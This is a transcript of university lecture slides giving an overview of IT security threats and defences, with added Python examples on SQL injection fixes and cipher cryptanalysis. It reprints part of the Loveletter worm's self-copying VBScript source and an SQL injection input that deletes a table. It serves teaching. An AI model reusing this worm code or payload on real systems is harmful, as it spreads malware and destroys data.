IT security: A quick tour
© Prof. Till Hänisch, Prof. Dr. Hans Jürgen Ott, Univ. of Cooperative Education Heidenheim, Dpt. of Business Information Systems

Post on 26-Mar-2015

215 views

Category:

Documents


1 download

TRANSCRIPT

Slide 1: IT security. A quick tour

Slide 2: The security problem is real.
Chart: computer criminality, recorded cases; credit card frauds. Source: Bundeskriminalamt 2004, http://www.bka.de/

Slide 3: Registered frauds.
Chart. Source: CERT Coordination Center, Software Engineering Institute, Carnegie Mellon University, http://www.cert.org/stats/, June 2005

Slide 4: Internet criminality as shooting star.
Chart: trends in computer criminality in Germany. Categories: computer criminality, especially credit card fraud; data and program misuse; hacking, spying; computer fraud; computer sabotage; spying; program piracy (dealing in illegal copies of programs). Source: Bundeskriminalamt 2004, http://www.bka.de

Slide 5: Overview
• Overview
• Some threats (some!)
• Example solutions: authentication (who is it?), encryption (keep data confidential)
• What to do?

Slide 6: Data security: DIN 44300, Part 1.
• protection of data (stored or transmitted) from destruction (loss, damage, manipulation) and from misuse
• privacy protection: protection of persons from harm caused by processing data about these persons
Figure labels: spying, fraud, non-availability, sabotage

Slide 7: Security criteria.
• integrity: consistency (data are not contradictory); correctness (data correspond to reality)
• confidence (confidentiality): data access only by authorized persons
• authenticity: authentication of users; data persistence
• availability: access to programs and data at any (intended) time by authorized persons
Examples of security risks listed alongside the criteria: DoS, DDoS, mail flooding; hacking; fake orders, spoofing; spying, fraud, non-availability, sabotage; computer viruses (damage 2003 worldwide: 55 billion $)

Slide 8: MS Outlook Loveletter: love blinds....
Figure: MS Outlook with "@" addresses fanning out from it.

Slide 9: A simple Visual Basic program.
The beginning of the Loveletter worm source as shown on the slide (the slide truncates it):

    rem barok -loveletter(vbe)
    rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    rem reads its own source text, which it later writes out again
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rem removes the Windows Scripting Host timeout so the script is not stopped
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    rem copies itself into the Windows and System folders under harmless-looking names
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    ....

Slide 10: (relatively) latest viruses.
Chart: time lags between discovery and prevention of new viruses.

Slide 11: Similar: SQL injection.......
File index.htm ... (not reproduced on the slide)
File db-request.php:

    $selstring = "SELECT * FROM sometable WHERE afield=$sstring'";
    $conn = pg_Connect("localhost", "5432","","","somedb");
    $result = pg_Exec($conn, $selstring);

Two inputs for the search field: "Maier" and "Maier; delete from sometable". The second one is not a name: because the input is pasted into the SQL text, it arrives at the database as an additional SQL statement.

Slide 12: Distributed Denial-of-Service attack (DDoS).
Diagram: attacker -> master -> slaves (a daemon is installed on each) -> victim.
Problems: separating "good" from "bad" requests; router misconfiguration: malformed IP packets knock out the router's function.
Intrusion Detection Systems: http://www.iss.net
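Worked example for the SQL injection of slide 11 (added here; not code from the slides): the db-request.php construction is reproduced in Python, with the quoting exactly as printed on the slide, next to the parameterized query a defender would use instead, run against a constructed in-memory SQLite table. The table rows, the column amount and the helper names are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the slide's 'sometable' (rows are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sometable (afield TEXT, amount INTEGER)")
    conn.executemany("INSERT INTO sometable VALUES (?, ?)",
                     [("Maier", 10), ("Huber", 20), ("Schmidt", 30)])
    return conn


def query_built_like_the_slide(sstring: str) -> str:
    """db-request.php's construction, quoting copied as printed on slide 11:
    the user's input is pasted straight into the SQL text. The string is only
    built here, never executed, to show that "delete from sometable" has become
    a second SQL statement instead of a name being searched for."""
    return f"SELECT * FROM sometable WHERE afield={sstring}'"


def safe_lookup(conn: sqlite3.Connection, sstring: str) -> list:
    """Parameterized fix: the value travels separately from the statement, so
    it can only ever be compared against afield, never parsed as SQL."""
    cur = conn.execute(
        "SELECT afield, amount FROM sometable WHERE afield = ?", (sstring,))
    return cur.fetchall()


def row_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM sometable").fetchone()[0]


def check_inputs() -> tuple:
    """Run slide 11's two inputs through the parameterized lookup and report
    the matches for each plus the number of rows left in the table."""
    db = make_db()
    return (safe_lookup(db, "Maier"),
            safe_lookup(db, "Maier; delete from sometable"),
            row_count(db))


if __name__ == "__main__":
    for sstring in ("Maier", "Maier; delete from sometable"):
        print("concatenated SQL text:", query_built_like_the_slide(sstring))
    print("parameterized results and remaining rows:", check_inputs())
```

The second input is looked up literally by the parameterized query, matches nothing, and leaves all three rows in place.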
Slide 13: Wardriving, LAN jacking: invading mobile nets.

Slide 14: Countermeasures.
Matrix of measures against the criteria availability, authenticity, confidence, integrity: intrusion detection, digital signatures, encryption, VPN, firewall, access control, backup, password, biometry, virus protection, Managed Security Services.

Slide 15: Script kiddies: using hacker tools without responsibility.
Chart: skills of attackers versus complexity of hacker tools (source: c't 2/2002, p. 79). Examples placed on the chart: guessing of passwords, viruses, cracking of passwords, intrusion into unsecured systems, web worms.

Slide 16: Example: prevent unauthorized access.
• user identification: password, biometric methods, authentication methods
• define user privileges: who is authorized to access which resources
• admission control, access control: firewall, Intrusion Detection Systems
• encryption: access to the data is possible, but use of the data is not

Slide 17: Password cracking.
• brute force hack: trying out all possible combinations of characters
• dictionary hack: trying out a list of often used and well-known passwords or dictionaries; hybrid attack: combine dictionary passwords with numbers/characters
• spying out: looking over the shoulder; infiltrating a trojan horse
• social engineering: exploiting the naivety of persons who (don't) keep a secret, e.g. a fake mail to employees with a spoofed sender ("IT security dept.") and a password request. A recent study (BBC News) showed that 92% of participating people revealed personal details like mother's maiden name, first school, ... (Comm. ACM Vol. 48/6 p. 10)

Slide 18: Default passwords
Slide 19: Default passwords cont'd.
(screenshots only)

Slide 20: Social engineering.
With Java and JavaScript it is simple to implement a trojan horse which transmits the dial-up password to the hacker: a popup window imitating the dial-up window to the ISP; a message box fakes a connection breakdown.

Slide 21: Social engineering: original and fake.
(screenshots)

Slide 22: Example: Telekom phishing mail
(screenshot)

Slide 23: Biometry.
• hand geometry: position of bones and knuckles
• facial recognition: geometric position of eyes, nose; proportions
• iris: pattern around the pupil
• retina: vascular patterns on the retina
• voice: pattern of sound/frequency, rhythm of speech
• handwriting: speed, pressure, direction, ...
• typing rhythm
• fingerprint

Slide 24: eTokens. http://www.aks.com/

Slide 25: Encryption
Problem: data transmission over public (esp. wireless) networks is public!
Solution: a private network (expensive) or encryption: the sender applies a (mathematical) function to the message in such a way that only (!) the receiver can recover the original.
sender: E = e(K, M), with K = key, M = message
receiver: M = d(K, E), with E = encrypted message
works if M = d(K, e(K, M))

Slide 26: Substitution cipher
Simple encryption technique: replace every character by a different one. The transformation is the key:
Original alphabet: abcdefghijklmnopqrstuvwxyz
Key:               qfwgxbdkpjhyzstiarnouvcelm
Encrypted text: q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk wkqrqwoxr

Slide 27: Cryptanalysis
Relative frequency of characters:

    letter   in encrypted text   in (English) text (publication)
    a        0.006               0.096
    b        0.020               0.015
    c        0.011               0.038
    d        0.003               0.039
    e        0.000               0.114
    f        0.026               0.020
    g        0.023               0.013
    h        0.003               0.035
    i        0.020               0.071
    j        0.000               0.002
    k        0.040               0.003
    l        0.020               0.047
    m        0.000               0.030
    n        0.062               0.065
    o        0.085               0.082
    p        0.060               0.034
    q        0.071               0.001
    r        0.051               0.061
    s        0.051               0.067
    t        0.040               0.095
    u        0.037               0.028
    v        0.003               0.008
    w        0.048               0.016
    x        0.114               0.005
    y        0.028               0.012
    z        0.011               0.002

Slide 28: Decrypted text
a chiffre has to ensure equal probabilities for all characters to prevent simple frequency based analysis a simple substitution is not sufficient anybody with a bit of time or a computer can break such codes easily these codes were used until the nineteenth century and were replaced by codes that change the substitution pattern with each character
Experiment: the message has a length of one character. Is cryptanalysis possible? No! If the key has the same length as the message, encryption is unbreakable! (One-time pad)

Slide 29: Enigma
(picture)

Slide 30: Real encryption techniques
• Complex combination of substitution and transposition: DES (old), AES (new)
• Symmetric: sender and receiver use the same key. Problem: how to transmit the key to many partners; long key (one-time pad): unsolved
• Asymmetric: different keys, public/private key. Discrete mathematics: factoring large numbers into their prime factors is difficult
• Signature: one-way functions
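Added example (not from the slides) covering slides 26 to 28: the substitution cipher with the slide's key and ciphertext, the letter-frequency table of slide 27 recomputed, and the frequency-ranking guess a cryptanalyst makes as a first step. The English ordering is taken from slide 27's right-hand column; the function names are my own.

```python
from collections import Counter
from string import ascii_lowercase as PLAIN

# Key and ciphertext as printed on slides 26 and 28; ENGLISH_BY_FREQUENCY is
# the right-hand column of slide 27 reduced to its ordering, most common first.
KEY = "qfwgxbdkpjhyzstiarnouvcelm"
ENCRYPT_MAP = dict(zip(PLAIN, KEY))
DECRYPT_MAP = dict(zip(KEY, PLAIN))
ENGLISH_BY_FREQUENCY = "eatoisnrldchpmufwbgyvxkjzq"
CIPHERTEXT = (
    "q wkpbbrx kqn ot xsnurx xauqy irtfqfpypopxn btr qyy wkqrqwoxrn ot "
    "irxvxso npziyx brxauxswl fqnxg qsqylnpn q npziyx nufnopouopts pn sto "
    "nubbpwpxso qslftgl cpok q fpo tb opzx tr q wtziuoxr wqs frxqh nuwk "
    "wtgxn xqnpyl okxnx wtgxn cxrx unxg usopy okx spsxoxxsok wxsourl qsg "
    "cxrx rxiyqwxg fl wtgxn okqo wkqsdx okx nufnopouopts iqooxrs cpok xqwk "
    "wkqrqwoxr"
)

def substitute(text: str, table: dict) -> str:
    """Monoalphabetic substitution; characters outside the table pass through."""
    return "".join(table.get(ch, ch) for ch in text)

def encrypt(message: str) -> str:
    return substitute(message, ENCRYPT_MAP)

def decrypt(ciphertext: str) -> str:
    return substitute(ciphertext, DECRYPT_MAP)

def letter_frequencies(text: str) -> dict:
    """Relative frequency of each letter (spaces ignored), as on slide 27."""
    counts = Counter(ch for ch in text if ch in PLAIN)
    total = sum(counts.values())
    return {ch: counts[ch] / total for ch in PLAIN}

def most_frequent_letter(text: str) -> str:
    freq = letter_frequencies(text)
    return max(PLAIN, key=freq.get)

def frequency_guess(ciphertext: str) -> dict:
    """First cryptanalysis step: pair the i-th most common cipher letter with
    the i-th most common English letter (ties keep alphabetical order)."""
    freq = letter_frequencies(ciphertext)
    ranked = sorted(PLAIN, key=lambda ch: -freq[ch])
    return dict(zip(ranked, ENGLISH_BY_FREQUENCY))

def guess_score(ciphertext: str) -> int:
    """How many of the 26 guessed pairs agree with the real key."""
    guess = frequency_guess(ciphertext)
    return sum(guess[ch] == DECRYPT_MAP[ch] for ch in PLAIN)

if __name__ == "__main__":
    print(decrypt(CIPHERTEXT))
    top = most_frequent_letter(CIPHERTEXT)
    print(f"most frequent cipher letter {top!r} guessed as {frequency_guess(CIPHERTEXT)[top]!r}")
    print(f"{guess_score(CIPHERTEXT)} of 26 pairs right from frequencies alone")
```

On this short text the most frequent cipher letter x is correctly read as e, but only a handful of the other pairs come out right: the frequency table seeds the analysis, and word patterns have to do the rest.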
Slide 31: Protection of data transmission.
• encryption: access is useless for attackers
• electronic certificates/signatures: authentication of communication partners
• combination: Virtual Private Network (VPN): data packets get packed (encapsulated) and transmitted through a tunnel
Diagram: VPN client (e.g. a firewall) <-> tunnel <-> VPN client; properties: confidence (confidentiality), authenticity.

Slide 32: Security measures in use.
Chart (in percent, Germany vs. USA): antivirus software, Virtual Private Networks (VPN), automatic backup, personal firewalls, content filtering, intrusion detection systems, network firewalls, application firewalls, dial-back or secure modems. Source: IT-Security 2003; June/July, 2500 interviews with CIOs.

Slide 33: Best practices that block most attacks.
• Use an application layer firewall.
• Automatically update your antivirus software at the gateway, server and client.
• Keep all of your systems and applications updated. Hackers commonly break into a web site through known security holes, so make sure your servers and applications are patched and up to date.
• Turn off unnecessary network services.
• Remove all unneeded programs.
• Scan the network for common backdoor services: use intrusion detection systems, vulnerability scans, antivirus protection.

Slide 34: Problems with secure systems
• Easy to block most (simple) attacks
• How to block qualified attackers?
• Tradeoff: security vs. usability vs. cost
Problem: bad usability can lead to bad security: restrictive password policy --> hard to remember --> people write passwords down on paper

Slide 35: Clever solutions.....
• Instead of passwords, ask personal questions ("personal entropy"): name of your most loved pet? The name of Paris Hilton's dog is Tinkerbell; her T-Mobile account was hacked.
• Logins are blocked after some unsuccessful attempts (typ. 3): you are bidding on something at eBay, you know your hardest competitor's name, try to log in with his account and some password --> his account will be blocked --> denial-of-service attack
• What would happen if ATMs required your fingerprint? Maybe fewer frauds? Maybe more people will be robbed? (See cars with engine immobilisers)

Slide 36: You can use the most advanced technology...
Slide 37: Someone will find a way to break your system if he really wants...
Slide 38: You can just make his life a little harder...

Slide 39: There is no secure system
• Don't trust anybody who tells you he can build an absolutely secure system: he's either naive or lying. The weakest link counts (possibly out of your control): SQL Slammer took out 20% of ATMs in the US (cost banks tens of millions of dollars), Continental couldn't fly for 12 hours. Why? Not because the servers were vulnerable, but because the network connections were overloaded.
• Design problems (protocols, languages, ...): not designed for today's use. Solutions are known but hard to use, example: no stack protection in many languages. Manipulations are possible, for example buffer overflows could be avoided but often are not (more work); SQL injection could be avoided but often is not (more work).
• Programming errors (bugs) allow exploits; patches are always late (zero-day exploits)
• (Better) processes can help avoid problems

Slide 40: Level of security
• How much security do you need? Analyze data, risks, ... Online weather forecast vs. online banking
• How much security do you want? Usability, cost
• Methods for dealing with risks: technical, organizational (education, ...)
• No silver bullet
• Security services are (and will be even more) good business (Communications of the ACM Vol. 48/6 p. 82)

Slide 41: Security conception.
Diagram: preconditions (security goals, actual state, system limits) -> specification of security objects -> policy conception -> threat analysis, risk analysis, damage analysis -> updating the conception. Security policy: recognising threats, evaluating threats, avoiding threats.

Slide 42: A final risk remains...
Diagram: overall risk without security procedures -> risk prevention (firewall, intrusion detection) -> risk reduction (education, virus tools) -> risk shifting (insurance) -> residual risk.
Risk estimation of the security tools in use: certificates, certification authorities, security standards. Problem: estimation of the residual risk.